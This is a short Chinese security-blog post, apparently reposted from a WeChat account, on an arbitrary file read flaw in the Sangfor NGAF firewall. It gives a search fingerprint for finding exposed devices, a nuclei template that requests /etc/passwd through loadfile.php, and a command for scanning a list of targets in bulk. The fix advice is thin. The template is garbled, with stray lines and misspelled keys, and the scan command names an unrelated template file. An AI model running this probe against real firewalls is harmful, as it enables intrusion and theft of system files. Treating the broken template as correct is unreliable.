免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
深信服 NGAF 任意文件读取漏洞
02
—
漏洞影响
版本信息不详
03
—
漏洞描述
深信服下一代防火墙NGAF专注网络边界安全效果,通过应用丰富的安全创新防御技术和简单易用的产品设计理念,不仅增强网络边界的安全检测与防控能力,而且实现网络安全风险可视化展示与快速处置,让组织网络边界安全建设更有效、更简单。该系统存在任意文件读取漏洞,会造成敏感信息泄露。
04
—
title="SANGFOR | NGAF"
05
—
漏洞复现
06
—
nuclei poc
公众号复制代码存在格式问题,poc 已上传网盘,后台回复0009免费获取
id: sangfor-ngaf-fileread
info:
name: 深信服 NGAF 任意文件读取漏洞
author: fgz
severity: high
reference:
none
metadata:
title="SANGFOR | NGAF" :
veified: true
tags: fileread
http:
raw:
|
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host: {{Hostname}}
Accept: */*
application/x-www-form-urlencoded :
127.0.0.1 :
matchers:
type: dsl
dsl:
"status_code == 200 && contains(body, 'root')"
运行POC批量目标扫描命令如下,1.txt文件中每行一个url
.nuclei.exe -t ./nuuo-nvr-rce.yaml -l 1.txt -me ttt
07
—
修复建议
关注官方补丁
08
—
感谢您的关注
原文始发于微信公众号(AI与网安):深信服NGAF任意文件读取漏洞(附nuclei poc)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论